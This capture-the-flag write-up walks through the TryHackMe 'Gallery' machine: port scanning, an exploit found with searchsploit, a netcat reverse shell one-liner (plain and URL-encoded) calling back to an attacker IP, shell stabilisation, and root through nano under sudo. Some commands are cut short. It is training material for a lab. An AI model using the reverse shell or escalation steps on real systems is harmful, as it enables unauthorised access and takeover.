TryHackMe: Gallery

Al1z4deh:~# echo "Welcome"
3 min readApr 18, 2022


Today we will take a look at TryHackMe: Gallery. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

Question: How many ports are open?

Command: sudo nmap -sS -sC -sV -oN nmap/initial

Question: What’s the name of the CMS?

Answer: S***** I**** G******

I searched for a suitable exploit and found it

Let’s exploit.

Command: locate

Command: searchsploit -m /usr/share/exploitdb/exploits/php/webapps/

Command: python

Get Reverse Shell

Command: rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP 4242 >/tmp/f

But first let’s encode

Command: rm%20-f%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.8.223.65%204242%20%3E%2Ftmp%2Ff%0A

Enter these commands after receiving the Reverse Shell

Command: script /dev/null -c bash

Command: export TERM=xterm

Command: ctrl+z

Command: stty raw -echo ; fg

Command: reset

Let’s enumerate the machine with

Here we found the necessary credentials credentials

Let’s change the user.

Command: su mike

Privilege Escalation

Let’s look at the file

Here we can use nano to get a shell. Let’s take a look at this

Command: sudo -u root /bin/bash /opt/

Command: read

Command: CTRL+R

Command: CTRL+X

Command: reset; sh 1>&0 2>&0

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”



Al1z4deh:~# echo "Welcome"

Al1z4deh:~# echo "eJPT, CEH, OSCP"